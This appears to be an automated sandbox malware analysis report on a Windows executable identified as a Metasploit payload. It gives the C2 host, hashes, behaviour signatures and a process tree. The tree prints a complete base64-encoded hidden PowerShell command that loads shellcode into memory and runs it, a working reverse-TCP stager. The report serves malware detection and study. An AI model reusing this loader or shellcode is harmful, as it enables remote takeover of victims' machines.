Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240611-en locale:en-us os:windows10-2004-x64 system
  • submitted
    22-06-2024 21:48

General

  • Target

    03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe

  • Size

    457KB

  • MD5

    03f9fd2ed89de09d2dbed8de06f8fe76

  • SHA1

    4abfa12b785713bcb8a8d07175114dc903196fc3

  • SHA256

    ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624

  • SHA512

    f11a7029308abaa10f5b5cda1c04997f24d3e275b101533a15aa74645b05ed102f448002bfdeb2df86ca6651ab707eaa20fa1e1835851dc18754b2fdeb9ff1d3

  • SSDEEP

    6144:x9JLFprEWDl7s5t38dX6pKE4dU7kpoTcnFOHuln+Otc+EkzI8jSejCE8aKP3sGvt:x99gbP/GFK9ACwdag/2OuV8IRCg

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp_dns

C2

testme.com:80

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:720
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAw
AHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAw
AHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAk
AGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand 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
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5004
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4484
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES414F.tmp" "c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP"
              6⤵
              PID:4776

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Filesize

      53KB

      MD5

      06ad34f9739c5159b4d92d702545bd49

      SHA1

      9152a0d4f153f3f40f7e606be75f81b582ee0c17

      SHA256

      474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

      SHA512

      c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

    • C:\Users\Admin\AppData\Local\Temp\RES414F.tmp

      Filesize

      1KB

      MD5

      32301361b323937c28a85c9e3626607b

      SHA1

      4476c5069156ae769ee91eef123c51204f20468c

      SHA256

      e3da5c07c50ac0166d7a7391687a256973c6c59e01a2dc147c376bcb3f383aa6

      SHA512

      5c7cd2b42fed276f134261677fdb3f733e6ae4e45bd9d10a974de93f90440fd75bd93c024e2fe2f4c2bef24f0c032deffb933d62855f9051ebd4d8651c4ef243

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0rpvq3ti.e51.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.dll

      Filesize

      3KB

      MD5

      71bbf2f34607364c50420c9db477d25c

      SHA1

      78febc656937380b72684fa09f74d707d5a669eb

      SHA256

      d3dcc264749ebcef1489722ddd0a1f72547cde119d091b50c53eec33d8b4a9a5

      SHA512

      a5d8532c9a8bc43d3d2681e8a96dd67a277d62be5bf90cab9d135132eeccfda570634e803ca87a14fac959e22e1db9559b09841e27387cb72c9ffbc0df4ad139

    • \??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP

      Filesize

      652B

      MD5

      7b179e0bbe6cdabcb8adb8846f7ab4e8

      SHA1

      d7e4dfdf2f378f889f652008abd204c81de3660b

      SHA256

      5b850be8355ad0509406ad1d3ced0173a62b7dd4c7004437669fd12f1ac3edec

      SHA512

      ac5143f24ddace9a581653e8ed80bda120f93544a822a16d3a3552e57f9c666c60075d76e4cbff8b4f10199f23375655fa8a5109565edf84a398d7383d310e35

    • \??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.0.cs

      Filesize

      557B

      MD5

      7319070c34daa5f6f2ece2dfc07119ee

      SHA1

      f26a4a48518a5608e93c8b77368f588b0433973c

      SHA256

      b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

      SHA512

      34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

    • \??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline

      Filesize

      369B

      MD5

      9b594472d3edd2866e41a9409e174c28

      SHA1

      fb712249b60038b2d2b4c690acf70a7c78774281

      SHA256

      962cfab3660f467575af9bd80140232b991b0eb58f8c5ac5cc8e35229376f17c

      SHA512

      ef277ee443c64be051e9add3a2d2ec818b519223739fababc9806784fb05017e508f4eaf31bfb4bb618a22772048ea358d966302f6095972f3f3466d2901bbaa

    • memory/720-0-0x0000000000400000-0x0000000000476000-memory.dmp

      Filesize

      472KB

    • memory/1988-21-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/1988-33-0x0000000006490000-0x00000000064AA000-memory.dmp

      Filesize

      104KB

    • memory/1988-63-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/1988-32-0x0000000007900000-0x0000000007F7A000-memory.dmp

      Filesize

      6.5MB

    • memory/1988-22-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/3644-5-0x00000000056D0000-0x00000000056F2000-memory.dmp

      Filesize

      136KB

    • memory/3644-3-0x0000000005B80000-0x00000000061A8000-memory.dmp

      Filesize

      6.2MB

    • memory/3644-19-0x0000000006790000-0x00000000067AE000-memory.dmp

      Filesize

      120KB

    • memory/3644-9-0x00000000061B0000-0x0000000006504000-memory.dmp

      Filesize

      3.3MB

    • memory/3644-7-0x0000000005AE0000-0x0000000005B46000-memory.dmp

      Filesize

      408KB

    • memory/3644-8-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/3644-6-0x0000000005970000-0x00000000059D6000-memory.dmp

      Filesize

      408KB

    • memory/3644-20-0x0000000006830000-0x000000000687C000-memory.dmp

      Filesize

      304KB

    • memory/3644-1-0x0000000074E7E000-0x0000000074E7F000-memory.dmp

      Filesize

      4KB

    • memory/3644-4-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/3644-2-0x0000000002ED0000-0x0000000002F06000-memory.dmp

      Filesize

      216KB

    • memory/3644-59-0x0000000074E7E000-0x0000000074E7F000-memory.dmp

      Filesize

      4KB

    • memory/3644-60-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/5004-57-0x0000000006CE0000-0x0000000006CE1000-memory.dmp

      Filesize

      4KB

    • memory/5004-55-0x0000000006080000-0x0000000006088000-memory.dmp

      Filesize

      32KB